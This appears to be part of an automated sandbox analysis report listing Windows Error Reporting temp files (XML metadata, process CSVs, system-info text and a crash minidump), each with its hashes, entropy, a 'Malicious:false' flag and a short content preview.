                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.7.2.<./.P.i.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF4E.tmp.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4741
                                                                        Entropy (8bit):4.4850374449629395
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsCJg771I9ZOWpW8VYmYm8M4JCyx2Fcryq85LI5LKtF7d:uIjfQI76v7VuJCYrPutF7d
                                                                        MD5:BCE06B2ABB11214CDD03D3EB6492A8AF
                                                                        SHA1:B7F43C601D5ED65837F02B4E4E25DF1BEC0254A6
                                                                        SHA-256:2F943F373CC5914CEC6E7A09D5C7B0013CADFA79EE381C7DD1D4A17C03D8D0E7
                                                                        SHA-512:7099951995551EA1513664CCDBD809F6B0AD33452F40A8FABA085E72C0CC0222C750D3651C443623EDD6EDBAA98F0B4F11277BF95A326D796A9D0F69B9A4B871
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF8B.tmp.csv

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):89708
                                                                        Entropy (8bit):3.015676307077526
                                                                        Encrypted:false
                                                                        SSDEEP:768:ovduBsYsA5bYLnAkQP842VvLayon+yYKCZOgy+axKl+HnYl1V:6dFYh5bYLJS8LVLayo+7KCwgy+CnYlX
                                                                        MD5:1A873C7F6A9EDA15D868E8CDB46ACA5C
                                                                        SHA1:9A27F3751DD6E49CF2CF15949C974D01F09BEF91
                                                                        SHA-256:00818275EB29EC5B6E557AA7438C015BFEBC0D0B979DB06F98C99973B623D2CD
                                                                        SHA-512:3BD581CE84EB11FB8F2EC1CEC213F04019B643787641D08E6021DCFB5DDA76C0CC868CAAF6E203F065843763B22556AA662FD11EAF52694045586CE7682F344D
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC038.tmp.txt

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.6842338093922273
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWmozGCqYhDYH6WLHAYEZWqtEiy41NYwLH3QaeYiMMupiIa33:2ZDfqyg/mXQaeYXMupFa33
                                                                        MD5:6DA75440D2DFC9F232C802F6B38FC9AB
                                                                        SHA1:DD1748BE82540745C6EE2E5456C159CBFED8CE46
                                                                        SHA-256:08EAB1AE27DB6318B9C05A1CF9B112E09A1E8EA6098FC7945141ABA56B77681A
                                                                        SHA-512:BEBDDBA13EDFEC0A002BCB1ADEA5B21A1FC1D3D5A521242E6B5293C1FE55E98FC0AAE700087F60875516D4673E37291BEF38FE43187E6FB65BB48A2F9652723F
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB44.tmp.WERInternalMetadata.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8598
                                                                        Entropy (8bit):3.7013988928739225
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJss7m6YEf9nMgmfZmAuJJkU2prw89bH5lfftm:R6lXJX7m6YEFMgmfUHJJ3+HLfo
                                                                        MD5:FE0C5C4D6EAD21B83D07AC8C5C436E43
                                                                        SHA1:4E6FC67F231A654BE161D9239B7A308920A05DF9
                                                                        SHA-256:66DFCC741596AE5BDA90ED02CA7F65E67C61ACDE49D99399EB83A69EC3890246
                                                                        SHA-512:956EBD8093301F5B1B1B686C60E057A5240783748926228A8A623E0B46C6D3215CB243EE501B0DADA7018AD92F3C9F84CD1E12AC25A67CD1091C61AA1068DC63
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.2.<./.P.i.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB83.tmp.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4796
                                                                        Entropy (8bit):4.4784694108107885
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsCJg771I9ZOWpW8VYtYm8M4JCyxE6FPyq8v3xEWLKtFZd:uIjfQI76v7VBJC78WyWutFZd
                                                                        MD5:E79503B05EB54496A5E3C075908EA19D
                                                                        SHA1:28C30E870B43968420AFF77A533F385879BCC4B2
                                                                        SHA-256:0E154BF7A60E22FD102E27F1A30F1760D03871EB608ABA9799C22C88F6616B98
                                                                        SHA-512:24129300828B165E4A6F659EE307031FBF9A7A9D2A0B41694ED4D02DD9A6B9D21D53601560DCFA5565CAB462690EBF261CD57F362EB592E6F185C4365143A1D3
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBB2.tmp.csv

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):90296
                                                                        Entropy (8bit):3.014745004795277
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gnXFwYbMYLd8TVTuyf7zlhu+4CnYlFCn9L:gnXFwYbMYLd8TVTuyf7zlhu+4kYlFCnp
                                                                        MD5:7968B8BE0EB69E9DF28CFCD387BEEA72
                                                                        SHA1:B6EF9A318F1A97BB68FAE02F98E91DE4498E3424
                                                                        SHA-256:F919BAB3FE1E51230071DE41C907668FEBC8A8E1FD12EDA1DC7931445C3FEB30
                                                                        SHA-512:E773E7F88F147C11545A0C604D8261F4C81A81359D9DE0F7B7800E1889E2761E6001F6C7A42C4496FA8E6837453E2CB7D58495C314E61DD3B1142962F4171E74
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC40.tmp.txt

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.684643728019824
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWjxEssUvBYs3YgWfHYQYEZQ7tEiKK4ONXmwEG9KM1aIY3MEFvIh33:2ZDjx7L5Fr2AaIY3MEFAh33
                                                                        MD5:78B7B8A80A4EA5BB48DD77FF795F2E15
                                                                        SHA1:169A1763C7BCAE5B460F83F66F4796ABD84C6493
                                                                        SHA-256:CC79D505B0399F8AD2EC67085C9608ED198BCD0E916AC33F28346E6635627D13
                                                                        SHA-512:2B422ED8B89272C0C1CE012303542FF37161C6C5EF488C4CE52B85B3516D7AEB6DB87E4D8BD3CD522800522E02351802E89FEBF7D41B3BABE7A30E912B6BA777
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD370.tmp.dmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:13 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):501361
                                                                        Entropy (8bit):3.269953305127442
                                                                        Encrypted:false
                                                                        SSDEEP:3072:kJBLdORm2V4JgqR7Z/UduqtMnH4KuycS+tluz1CCqscxXFS3+vuFjlCdNR3:kOm2+rRKMnHVXGkrqrxXY3Qv
                                                                        MD5:4434E08191CA1BA078A4127FF10877A0
                                                                        SHA1:327DC106423AB954855B24E761CBC13E66404E9F
                                                                        SHA-256:960DAB624C8533E6B59F37771F188BD7BDC9411B62048932FFAD7D7F5185E9AB
                                                                        SHA-512:CB3DBE7BD304EF2DFE9D8B422006DA527C01BF51916E57262365DEADD2750666D4FF34AD567F76FAE08C5ECCD56C7E072BC1B8096D8E1AB7598A92766C179139
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................p...........$...4%..........X%......tQ..............l.......8...........T............:..il..........lC..........XE..............................................................................eJ.......E......Lw......................T.......D....';f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4D9.tmp.WERInternalMetadata.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8592
                                                                        Entropy (8bit):3.703937229659879
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJjlZdC6Y9DQgbgmf4Ad6J0NprZ89ba8xfmem:R6lXJBZdC6Y5Qkgmf44ivayfW
                                                                        MD5:299CB989E8C9F2D49803E9578F25C23D
                                                                        SHA1:1ECAAD444EF90532BCD333CB7B33F9A5F39ADC16
                                                                        SHA-256:52CF8C26E6F15C81376E51EE1034EA145565D57BA3D245D2BC4BAD7AD1F35D30
                                                                        SHA-512:6D499953B4DDA260DA9641E589531617555754303883F18DFAB2EBAD8344D029FA77628E522DADFE03E3629F944F413E2A2D83D54C051B74A641E3FB6D2986F8
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.4.8.<./.P.i.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD538.tmp.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4741
                                                                        Entropy (8bit):4.487444832963755
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsCJg771I9ZOWpW8VY/Ym8M4JCyx2FCyq85LITLKtF3d:uIjfQI76v7VLJC29utF3d
                                                                        MD5:A31F25C950A40DA73B655D1834F15E99
                                                                        SHA1:CB0391A5C2A427AB245405DA474C15FF4536AC60
                                                                        SHA-256:72239715DC07C5216D0D82A3E1BA50197297AE687EF4DC39D4B5BE8815DA57AC
                                                                        SHA-512:A42540740F44A9FD3F7C72DE631D95B047629C89EEC85E65D9BCFED73C0AC053CBFFC36AA2C080CFECFF560CAB843CD3A216180CCB0E9D198FB4A58D000F600E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD568.tmp.csv

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):91570
                                                                        Entropy (8bit):3.01343198428794
                                                                        Encrypted:false
                                                                        SSDEEP:1536:wgBCYbRMGAo82VGkyE7A8JLeDanYlHUI/h:wgBCYbRMGAo82VGkyE7A8JLeD8YlHUIp
                                                                        MD5:084467333873DEB3FCD11C7BF5194D3D
                                                                        SHA1:D2BAEC26BE38A6442FF2B378A6205C19DA2B52B1
                                                                        SHA-256:05031E4EF52954719C9C9920CDA834B626FC4243367706F2C7418B6839B8A2B5
                                                                        SHA-512:331545D104136B91F8E29C35378660623C9EF18F8F47C4B67343CB288DCA6ACE305A324DCB01419EF1E7131D7F188A44322A0B0CA2B85A7D17B4F35FA9BC3C3E
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD615.tmp.txt

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.6849015903033657
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWu3yh8l/mYRYIW/HEYEZndtEiKs4CN2wXRXwa0Y+MfcyIn33:2ZDA1mWV5Ga0Y+MfcVn33
                                                                        MD5:6F3BD7DEE8A929AF3D2915463C750BE5
                                                                        SHA1:CC574255CDA995AD2C5CFEF8CB6429733DC51E6A
                                                                        SHA-256:F4D97863A454C7C3A5B80B2791395560E529DE25711329F070AF395A4E00A9BF
                                                                        SHA-512:D72E2A5AC2B24200E47C4E155C6DD64F9E4BD7C76107F20DE076FDF8AF7B59AC7BBB7E9E36C2ADF635E37C39A58DAD10497915B1E3404C10578A55434F81FAE1
                                                                        Malicious:false
